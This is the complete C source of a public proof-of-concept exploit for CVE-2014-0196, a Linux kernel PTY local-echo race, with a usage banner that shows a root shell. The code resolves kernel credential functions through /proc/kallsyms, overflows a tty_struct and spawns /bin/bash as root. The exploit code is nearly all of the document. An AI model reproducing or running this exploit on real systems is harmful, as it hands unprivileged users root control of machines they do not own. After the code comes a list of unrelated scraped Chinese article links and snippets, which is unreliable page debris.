/*

 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

 * condition

 *

 * Slightly-less-than-POC privilege escalation exploit

 * For kernels >= v3.14-rc1

 *

 * Matthew Daley <mattd@bugfuzz.com>

 *

 * Usage:

 *   $ gcc cve-2014-0196-md.c -lutil -lpthread

 *   $ ./a.out

 *   [+] Resolving symbols

 *   [+] Resolved commit_creds: 0xffffffff81056694

 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7

 *   [+] Doing once-off allocations

 *   [+] Attempting to overflow into a tty_struct...............

 *   [+] Got it :)

 *   # id

 *   uid=0(root) gid=0(root) groups=0(root)

 *

 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4

 * chance that the overflow will go off the end of a slab. This does not

 * necessarily lead to an immediate kernel crash, but you should be prepared

 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be

 * avoidable by reading /proc/slabinfo on systems where it is still available

 * to unprivileged users.

 *

 * Caveat: The vulnerability should be exploitable all the way from

 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in

 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer

 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this

 * exploit relies on.

 *

 * Thanks to Jon Oberheide for his help on exploitation technique.

 */

#include <sys/stat.h>

#include <sys/types.h>

#include <fcntl.h>

#include <pthread.h>

#include <pty.h>

#include <stdio.h>

#include <string.h>

#include <termios.h>

#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200

#define RUN_ALLOCS    30

struct device;

struct tty_driver;

struct tty_operations;

typedef struct {

	int counter;

} atomic_t;

struct kref {

	atomic_t refcount;

};

struct tty_struct_header {

	int	magic;

	struct kref kref;

	struct device *dev;

	struct tty_driver *driver;

	const struct tty_operations *ops;

} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;

char buf[1024] = {0};

commit_creds_fn commit_creds;

prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {

	commit_creds(prepare_kernel_cred(0));

	return 0;

}

unsigned long get_symbol(char *target_name) {

	FILE *f;

	unsigned long addr;

	char dummy;

	char name[256];

	int ret = 0;

	f = fopen("/proc/kallsyms", "r");

	if (f == NULL)

		return 0;

	while (ret != EOF) {

		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);

		if (ret == 0) {

			fscanf(f, "%s\n", name);

			continue;

		}

		if (!strcmp(name, target_name)) {

			printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

			fclose(f);

			return addr;

		}

	}

	printf("[-] Couldn't resolve \"%s\"\n", name);

	fclose(f);

	return 0;

}

void *overwrite_thread_fn(void *p) {

	write(slave_fd, buf, 511);

	write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));

	write(slave_fd, &overwrite, sizeof(overwrite));

}

int main() {

	char scratch[1024] = {0};

	void *tty_operations[64];

	int i, temp_fd_1, temp_fd_2;

	for (i = 0; i < 64; ++i)

		tty_operations[i] = payload;

	overwrite.magic                 = TTY_MAGIC;

	overwrite.kref.refcount.counter = 0x1337;

	overwrite.dev                   = (struct device *)scratch;

	overwrite.driver                = (struct tty_driver *)scratch;

	overwrite.ops                   = (struct tty_operations *)tty_operations;

	puts("[+] Resolving symbols");

	commit_creds = (commit_creds_fn)get_symbol("commit_creds");

	prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");

	if (!commit_creds || !prepare_kernel_cred)

		return 1;

	puts("[+] Doing once-off allocations");

	for (i = 0; i < ONEOFF_ALLOCS; ++i)

		if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {

			puts("[-] pty creation failed");

			return 1;

		}

	printf("[+] Attempting to overflow into a tty_struct...");

	fflush(stdout);

	for (i = 0; ; ++i) {

		struct termios t;

		int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;

		pthread_t overwrite_thread;

		if (!(i & 0xfff)) {

			putchar('.');

			fflush(stdout);

		}

		if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {

			puts("\n[-] pty creation failed");

			return 1;

		}

		for (j = 0; j < RUN_ALLOCS; ++j)

			if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {

				puts("\n[-] pty creation failed");

				return 1;

			}

		close(fds[RUN_ALLOCS / 2]);

		close(fds2[RUN_ALLOCS / 2]);

		write(slave_fd, buf, 1);

		tcgetattr(master_fd, &t);

		t.c_oflag &= ~OPOST;

		t.c_lflag |= ECHO;

		tcsetattr(master_fd, TCSANOW, &t);

		if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {

			puts("\n[-] Overwrite thread creation failed");

			return 1;

		}

		write(master_fd, "A", 1);

		pthread_join(overwrite_thread, NULL);

		for (j = 0; j < RUN_ALLOCS; ++j) {

			if (j == RUN_ALLOCS / 2)

				continue;

			ioctl(fds[j], 0xdeadbeef);

			ioctl(fds2[j], 0xdeadbeef);

			close(fds[j]);

			close(fds2[j]);

		}

		ioctl(master_fd, 0xdeadbeef);

		ioctl(slave_fd, 0xdeadbeef);

		close(master_fd);

		close(slave_fd);

		if (!setresuid(0, 0, 0)) {

			setresgid(0, 0, 0);

			puts("\n[+] Got it :)");

			execl("/bin/bash", "/bin/bash", NULL);

		}

	}

}

CVE-2014-0196(马拉松赛跑bug)的更多相关文章

  1. SegmentFault 2014黑客马拉松 北京 作品demo

    1号作品展示——最熟悉的陌生人 app 利用录音(声纹识别)和照片来让好久不见的见面变得不那么尴尬. 2号作品展示——神奇魔镜 app 灵感来自通话<白雪公主>,穿越到今天的“魔镜”功能依 ...

  2. 洛谷P3113 [USACO14DEC]马拉松赛跑Marathon_Gold 线段树维护区间最大值 模板

    如此之裸- Code: #include<cstdio> #include<cstring> #include<cmath> #include<algorit ...

  3. 【独家】K8S漏洞报告 | 近期bug fix解读

    安全漏洞CVE-2019-3874分析 Kubernetes近期重要bug fix分析 Kubernetes v1.13.5 bug fix数据分析 ——本周更新内容 安全漏洞CVE-2019-387 ...

  4. Bash漏洞批量检测工具与修复方案

    &amp;amp;lt;img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" t ...

  5. Daily record-August

    August11. A guide dog can guide a blind person. 导盲犬能给盲人引路.2. A guide dog is a dog especially trained ...

  6. 你真的会玩SQL吗?表表达式,排名函数

    你真的会玩SQL吗?系列目录 你真的会玩SQL吗?之逻辑查询处理阶段 你真的会玩SQL吗?和平大使 内连接.外连接 你真的会玩SQL吗?三范式.数据完整性 你真的会玩SQL吗?查询指定节点及其所有父节 ...

  7. [译]git log进阶

    格式化log输出 oneline --oneline标记将每个commit压缩成一行. 默认情况下显示一个commit ID和commit描述的第一行. 输出如下: 0e25143 Merge bra ...

  8. RFID应用范围

    RFID应用范围 (1)物流: 物流过程中的货物追踪,信息自动采集,仓储应用,港口应用,邮政,快递 (2)零售: 商品的销售数据实时统计,补货,防盗 (3)制造业: 生产数据的实时监控,质量追踪,自动 ...

  9. Android安全研究经验谈

    安全研究做什么 从攻击角度举例,可以是:对某个模块进行漏洞挖掘的方法,对某个漏洞进行利用的技术,通过逆向工程破解程序.解密数据,对系统或应用进行感染.劫持等破坏安全性的攻击技术等. 而防御上则是:查杀 ...

随机推荐

  1. 【转载】逃离adapter的地狱-针对多个View type的组合实现方案

    英文原文:JOE'S GREAT ADAPTER HELL ESCAPE 转载地址:http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2015 ...

  2. [转帖]gesture recognition

    http://wenku.baidu.com/view/53c3331a6bd97f192279e9c9.html HSI与RGB的Matlab实现. http://wenku.baidu.com/v ...

  3. linux中挂载硬盘报错(you must specify the filesystem type)

    公司有台服务器做了raid1,由于容量小,需扩容,原先打算再添加两块硬盘进去做多一组raid1,组成两组raid1混合使用,但是公司抠门,买到服务器只能安装3块硬盘,无奈之下只能放多一块进去单独挂载分 ...

  4. Mysql 数据类型使用说明

    FLOAT 和DOUBLE 类型支持使用标准的浮点运算进行近似计算. DECIMAL类型用于存储精确的小数. 因为cpu不支持对DECIMAL的直接计算,所以在Mysql5.0及更高的版本中,MYSQ ...

  5. 《JavaScript dom 编程艺术》 placeholder占位符IE8兼容办法。

    在<JavaScript dom 编程艺术>第11章学来的. 相对于用JavaScript替换文本框的提示语句 <!DOCTYPE html> <html lang=&q ...

  6. JavaScript 学习-变量的作用域和块级作用域

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...

  7. centos和Ubuntu区别

    centos中新建的非root用户是没有sudo的权限的,如果需要使用sudo权限必须在/etc/sudoers 中加入账户和权限,所以切换到root账号的时候只需要输入:su,加入root账号的密码 ...

  8. POJ 1704 Georgia and Bob (Nim游戏变形)

    题目:http://poj.org/problem?id=1704 思路:Nim游戏策略,做如下转换,如果N是偶数,则两两配对,将两个数之间的格子数(距离)看做成这一堆石头的数量. 如果N是奇数,则将 ...

  9. HDU 1045 Fire Net(图匹配)

    题目大意: 这个是以前做过的一道DFS题目,当时是完全暴力写的. 给你一个N代表是N*N的矩阵,矩阵内 ‘X’代表墙, ‘.’代表通道. 问这个矩阵内最多可以放几个碉堡, 碉堡不能在同一行或者同一列, ...

  10. POJ 1511 SPFA+邻接表 Invitation Cards

    题目大意: 计算从 1 点 到 其他所有点的 往返距离之和, 因为是 有向图, 所以我们需要将图反存 一次, 然后求两次单源最短路, 结果就出来了. #include <iostream> ...